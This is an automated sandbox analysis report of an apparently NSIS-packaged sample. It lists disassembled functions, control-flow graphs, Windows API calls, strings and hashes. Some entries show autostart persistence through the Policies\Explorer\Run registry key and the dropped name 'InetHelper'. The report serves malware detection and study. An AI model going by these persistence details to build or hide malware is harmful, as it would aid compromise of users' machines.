                                                                                                                                                                                                              control_flow_graph 655 406af2-406af7 656 406b68-406b86 655->656 657 406af9-406b28 655->657 660 40715e-407173 656->660 658 406b2a-406b2d 657->658 659 406b2f-406b33 657->659 661 406b3f-406b42 658->661 662 406b35-406b39 659->662 663 406b3b 659->663 664 407175-40718b 660->664 665 40718d-4071a3 660->665 667 406b60-406b63 661->667 668 406b44-406b4d 661->668 662->661 663->661 666 4071a6-4071ad 664->666 665->666 669 4071d4-4071e0 666->669 670 4071af-4071b3 666->670 673 406d35-406d53 667->673 671 406b52-406b5e 668->671 672 406b4f 668->672 682 406976-40697f 669->682 674 407362-40736c 670->674 675 4071b9-4071d1 670->675 679 406bc8-406bf6 671->679 672->671 677 406d55-406d69 673->677 678 406d6b-406d7d 673->678 684 407378-40738b 674->684 675->669 683 406d80-406d8a 677->683 678->683 680 406c12-406c2c 679->680 681 406bf8-406c10 679->681 685 406c2f-406c39 680->685 681->685 686 406985 682->686 687 40738d 682->687 688 406d8c 683->688 689 406d2d-406d33 683->689 690 407390-407394 684->690 692 406bb0-406bb6 685->692 693 406c3f 685->693 694 406a31-406a35 686->694 695 406aa1-406aa5 686->695 696 40698c-406990 686->696 697 406acc-406aed 686->697 687->690 698 406d08-406d0c 688->698 699 406e9d-406eaa 688->699 689->673 691 406cd1-406cdb 689->691 700 407320-40732a 691->700 701 406ce1-406d03 691->701 702 406c69-406c6f 692->702 703 406bbc-406bc2 692->703 717 406b95-406bad 693->717 718 4072fc-407306 693->718 704 4072e1-4072eb 694->704 705 406a3b-406a54 694->705 710 4072f0-4072fa 695->710 711 406aab-406abf 695->711 696->684 709 406996-4069a3 696->709 697->660 706 406d12-406d2a 698->706 707 407314-40731e 698->707 699->682 700->684 701->699 712 406ccd 702->712 714 406c71-406c8f 702->714 703->679 703->712 704->684 713 406a57-406a5b 705->713 706->689 707->684 709->687 715 4069a9-4069ef 709->715 710->684 716 406ac2-406aca 711->716 712->691 713->694 719 406a5d-406a63 713->719 720 406c91-406ca5 714->720 721 406ca7-406cb9 714->721 722 4069f1-4069f5 715->722 723 406a17-406a19 715->723 716->695 716->697 717->692 718->684 724 406a65-406a6c 719->724 725 406a8d-406a9f 719->725 726 406cbc-406cc6 720->726 721->726 727 406a00-406a0e GlobalAlloc 722->727 728 4069f7-4069fa GlobalFree 722->728 729 406a27-406a2f 723->729 730 406a1b-406a25 723->730 731 406a77-406a87 GlobalAlloc 724->731 732 406a6e-406a71 GlobalFree 724->732 725->716 726->702 733 406cc8 726->733 727->687 734 406a14 727->734 728->727 729->713 730->729 730->730 731->687 731->725 732->731 736 407308-407312 733->736 737 406c4e-406c66 733->737 734->723 736->684 737->702
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                                                                                                                              • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 0040672B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(004D5000,0045E778,0045A730,00405E0E,0045A730,0045A730,00000000,0045A730,0045A730,004D5000,?,74DF2EE0,00405B1A,?,004D5000,74DF2EE0), ref: 00406736
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                                                              • String ID: xE
                                                                                                                                                                                                              • API String ID: 2295610775-407097786
                                                                                                                                                                                                              • Opcode ID: c38ed24b0f8540a8630b6e30e0d29a5f0a32ff0f94a31cb594348fc3b8955e5f
                                                                                                                                                                                                              • Instruction ID: fc51c24eb8738f718e6fd544cb5c99b56e4f1c2878dc56694a5fb172fd41157c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c38ed24b0f8540a8630b6e30e0d29a5f0a32ff0f94a31cb594348fc3b8955e5f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83D012315150205BD2011738AD4C85B7A589F153367218B37B866F61E0C7348C62869C
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00403AD8 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 215stringregistryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 137 403ad8-403af0 call 4067c2 140 403af2-403afd GetUserDefaultUILanguage call 40632f 137->140 141 403b04-403b3b call 4062b6 137->141 144 403b02 140->144 147 403b53-403b59 lstrcatW 141->147 148 403b3d-403b4e call 4062b6 141->148 146 403b5e-403b87 call 403dae call 405dc5 144->146 154 403c19-403c21 call 405dc5 146->154 155 403b8d-403b92 146->155 147->146 148->147 161 403c23-403c2a call 40640a 154->161 162 403c2f-403c54 LoadImageW 154->162 155->154 156 403b98-403bc0 call 4062b6 155->156 156->154 163 403bc2-403bc6 156->163 161->162 165 403cd5-403cdd call 40140b 162->165 166 403c56-403c86 RegisterClassW 162->166 167 403bd8-403be4 lstrlenW 163->167 168 403bc8-403bd5 call 405cea 163->168 179 403ce7-403cf2 call 403dae 165->179 180 403cdf-403ce2 165->180 169 403da4 166->169 170 403c8c-403cd0 SystemParametersInfoW CreateWindowExW 166->170 174 403be6-403bf4 lstrcmpiW 167->174 175 403c0c-403c14 call 405cbd call 4063e8 167->175 168->167 173 403da6-403dad 169->173 170->165 174->175 178 403bf6-403c00 GetFileAttributesW 174->178 175->154 182 403c02-403c04 178->182 183 403c06-403c07 call 405d09 178->183 189 403cf8-403d12 ShowWindow call 406752 179->189 190 403d7b-403d83 call 405523 179->190 180->173 182->175 182->183 183->175 195 403d14-403d19 call 406752 189->195 196 403d1e-403d30 GetClassInfoW 189->196 197 403d85-403d8b 190->197 198 403d9d-403d9f call 40140b 190->198 195->196 202 403d32-403d42 GetClassInfoW RegisterClassW 196->202 203 403d48-403d79 DialogBoxParamW call 40140b call 403a28 196->203 197->180 199 403d91-403d98 call 40140b 197->199 198->169 199->180 202->203 203->173
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                                                                                                                • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                                                                                                              • GetUserDefaultUILanguage.KERNELBASE(00000002,004D5000,74DF3420,004C1000,00000000), ref: 00403AF2
                                                                                                                                                                                                                • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                                                                                                                              • lstrcatW.KERNEL32(004D1000,00446728), ref: 00403B59
                                                                                                                                                                                                              • lstrlenW.KERNEL32(SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,?,?,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,00000000,004C5000,004D1000,00446728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00446728,00000000,00000002,004D5000), ref: 00403BD9
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,.exe,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,?,?,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,00000000,004C5000,004D1000,00446728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00446728,00000000), ref: 00403BEC
                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run), ref: 00403BF7
                                                                                                                                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C5000), ref: 00403C40
                                                                                                                                                                                                              • RegisterClassW.USER32(004681E0), ref: 00403C7D
                                                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                                                                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,004681E0), ref: 00403D2C
                                                                                                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,004681E0), ref: 00403D39
                                                                                                                                                                                                              • RegisterClassW.USER32(004681E0), ref: 00403D42
                                                                                                                                                                                                              • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                              • String ID: (gD$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run$_Nb
                                                                                                                                                                                                              • API String ID: 606308-2610290127
                                                                                                                                                                                                              • Opcode ID: 0a001c7189d7d63785f1ec2c4194aaaeaf8e16c765d4c7e048e7af561835fdd7
                                                                                                                                                                                                              • Instruction ID: 53e884cc7334fa84a1d96ccc45fe83da0addadf9397a6dbc28c3941536bb6224
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a001c7189d7d63785f1ec2c4194aaaeaf8e16c765d4c7e048e7af561835fdd7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E361D631200700BAD320AF669E49F2B3B6CEB8574AF00417FF945B22E2DB7D9D41866D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00402F30 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 203memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 210 402f30-402f7e GetTickCount GetModuleFileNameW call 405ede 213 402f80-402f85 210->213 214 402f8a-402fb8 call 4063e8 call 405d09 call 4063e8 GetFileSize 210->214 215 4031cf-4031d3 213->215 222 4030a8-4030b6 call 402e8e 214->222 223 402fbe-402fd5 214->223 230 403187-40318c 222->230 231 4030bc-4030bf 222->231 224 402fd7 223->224 225 402fd9-402fe6 call 403447 223->225 224->225 232 403143-40314b call 402e8e 225->232 233 402fec-402ff2 225->233 230->215 234 4030c1-4030d9 call 40345d call 403447 231->234 235 4030eb-403137 GlobalAlloc call 406923 call 405f0d CreateFileW 231->235 232->230 237 403072-403076 233->237 238 402ff4-40300c call 405e99 233->238 234->230 258 4030df-4030e5 234->258 261 403139-40313e 235->261 262 40314d-40317d call 40345d call 4031d6 235->262 242 403078-40307e call 402e8e 237->242 243 40307f-403085 237->243 238->243 256 40300e-403015 238->256 242->243 249 403087-403095 call 4068b5 243->249 250 403098-4030a2 243->250 249->250 250->222 250->223 256->243 260 403017-40301e 256->260 258->230 258->235 260->243 263 403020-403027 260->263 261->215 269 403182-403185 262->269 263->243 266 403029-403030 263->266 266->243 268 403032-403052 266->268 268->230 270 403058-40305c 268->270 269->230 271 40318e-40319f 269->271 272 403064-40306c 270->272 273 40305e-403062 270->273 275 4031a1 271->275 276 4031a7-4031ac 271->276 272->243 274 40306e-403070 272->274 273->222 273->272 274->243 275->276 277 4031ad-4031b3 276->277 277->277 278 4031b5-4031cd call 405e99 277->278 278->215
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,004DD000,00002000), ref: 00402F60
                                                                                                                                                                                                                • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,004DD000,80000000,00000003), ref: 00405EE2
                                                                                                                                                                                                                • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004E1000,00000000,004CD000,004CD000,004DD000,004DD000,80000000,00000003), ref: 00402FA9
                                                                                                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030F0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Error launching installer, xrefs: 00402F80
                                                                                                                                                                                                              • soft, xrefs: 00403020
                                                                                                                                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
                                                                                                                                                                                                              • Null, xrefs: 00403029
                                                                                                                                                                                                              • HA, xrefs: 004030F6
                                                                                                                                                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
                                                                                                                                                                                                              • Inst, xrefs: 00403017
                                                                                                                                                                                                              • *:o, xrefs: 004031B5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                                              • String ID: *:o$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$HA$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                              • API String ID: 2803837635-1291305336
                                                                                                                                                                                                              • Opcode ID: e6cc7feb225d5f91d4cb60b2c7bd5eae8f554926f74471ae7b4f53b82ba7c1c2
                                                                                                                                                                                                              • Instruction ID: d25a53c4d11647cbbad2ea8e7a2610e0d6e301d01d0d9af5663e5c20e349ab0e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e6cc7feb225d5f91d4cb60b2c7bd5eae8f554926f74471ae7b4f53b82ba7c1c2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E8610331D01205ABDB209FA4DD85B9E7BA8AB04316F24417BF904F72D1D77C8E808B9D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 0040640A Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209stringCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 281 40640a-406415 282 406417-406426 281->282 283 406428-40643e 281->283 282->283 284 406444-406451 283->284 285 406656-40665c 283->285 284->285 286 406457-40645e 284->286 287 406662-40666d 285->287 288 406463-406470 285->288 286->285 290 406678-406679 287->290 291 40666f-406673 call 4063e8 287->291 288->287 289 406476-406482 288->289 292 406643 289->292 293 406488-4064c6 289->293 291->290 297 406651-406654 292->297 298 406645-40664f 292->298 295 4065e6-4065ea 293->295 296 4064cc-4064d7 293->296 301 4065ec-4065f2 295->301 302 40661d-406621 295->302 299 4064f0 296->299 300 4064d9-4064de 296->300 297->285 298->285 308 4064f7-4064fe 299->308 300->299 305 4064e0-4064e3 300->305 306 406602-40660e call 4063e8 301->306 307 4065f4-406600 call 40632f 301->307 303 406630-406641 lstrlenW 302->303 304 406623-40662b call 40640a 302->304 303->285 304->303 305->299 310 4064e5-4064e8 305->310 319 406613-406619 306->319 307->319 312 406500-406502 308->312 313 406503-406505 308->313 310->299 315 4064ea-4064ee 310->315 312->313 317 406540-406543 313->317 318 406507-40652e call 4062b6 313->318 315->308 321 406553-406556 317->321 322 406545-406551 GetSystemDirectoryW 317->322 329 406534-40653b call 40640a 318->329 330 4065ce-4065d1 318->330 319->303 320 40661b 319->320 325 4065de-4065e4 call 40667c 320->325 327 4065c1-4065c3 321->327 328 406558-406566 GetWindowsDirectoryW 321->328 326 4065c5-4065c9 322->326 325->303 326->325 332 4065cb 326->332 327->326 331 406568-406572 327->331 328->327 329->326 330->325 335 4065d3-4065d9 lstrcatW 330->335 337 406574-406577 331->337 338 40658c-4065a2 SHGetSpecialFolderLocation 331->338 332->330 335->325 337->338 340 406579-406580 337->340 341 4065a4-4065bb SHGetPathFromIDListW CoTaskMemFree 338->341 342 4065bd 338->342 343 406588-40658a 340->343 341->326 341->342 342->327 343->326 343->338
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,00002000), ref: 0040654B
                                                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,00002000,00000000,0043E708,?,00405487,0043E708,00000000), ref: 0040655E
                                                                                                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,0043E708,?,00405487,0043E708,00000000), ref: 0040659A
                                                                                                                                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run), ref: 004065A8
                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                                                                                                                              • lstrcatW.KERNEL32(SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                                                                                                                              • lstrlenW.KERNEL32(SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,00000000,0043E708,?,00405487,0043E708,00000000), ref: 00406631
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                                              • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                              • API String ID: 717251189-3045395167
                                                                                                                                                                                                              • Opcode ID: 23f28206d8b90664ce3613e71128f54d67ce4c932df2e69045dd5148352027ec
                                                                                                                                                                                                              • Instruction ID: 4ff03c26a92b18a500a2dba0a5346c99a5613c7aa05bf40b8fc1f2faf6c00e92
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 23f28206d8b90664ce3613e71128f54d67ce4c932df2e69045dd5148352027ec
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59612271A00101ABDF209F64DD85AAE37A5AF50314F22813FE507BA2D1EB3D8EA1C75D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 408 40176f-401794 call 402c41 call 405d34 413 401796-40179c call 4063e8 408->413 414 40179e-4017b0 call 4063e8 call 405cbd lstrcatW 408->414 419 4017b5-4017b6 call 40667c 413->419 414->419 423 4017bb-4017bf 419->423 424 4017c1-4017cb call 40672b 423->424 425 4017f2-4017f5 423->425 433 4017dd-4017ef 424->433 434 4017cd-4017db CompareFileTime 424->434 426 4017f7-4017f8 call 405eb9 425->426 427 4017fd-401819 call 405ede 425->427 426->427 435 40181b-40181e 427->435 436 40188d-4018b6 call 405450 call 4031d6 427->436 433->425 434->433 437 401820-40185e call 4063e8 * 2 call 40640a call 4063e8 call 405a4e 435->437 438 40186f-401879 call 405450 435->438 450 4018b8-4018bc 436->450 451 4018be-4018ca SetFileTime 436->451 437->423 470 401864-401865 437->470 448 401882-401888 438->448 453 402ace 448->453 450->451 452 4018d0-4018db FindCloseChangeNotification 450->452 451->452 455 4018e1-4018e4 452->455 456 402ac5-402ac8 452->456 458 402ad0-402ad4 453->458 459 4018e6-4018f7 call 40640a lstrcatW 455->459 460 4018f9-4018fc call 40640a 455->460 456->453 467 401901-4022fc call 405a4e 459->467 460->467 467->456 467->458 470->448 472 401867-401868 470->472 472->438
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,InetHelper,InetHelper,00000000,00000000,InetHelper,004C9000,?,?,00000031), ref: 004017D5
                                                                                                                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00002000,00403576,00468240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(0043E708,00402F08), ref: 004054AB
                                                                                                                                                                                                                • Part of subcall function 00405450: SetWindowTextW.USER32(0043E708,0043E708), ref: 004054BD
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
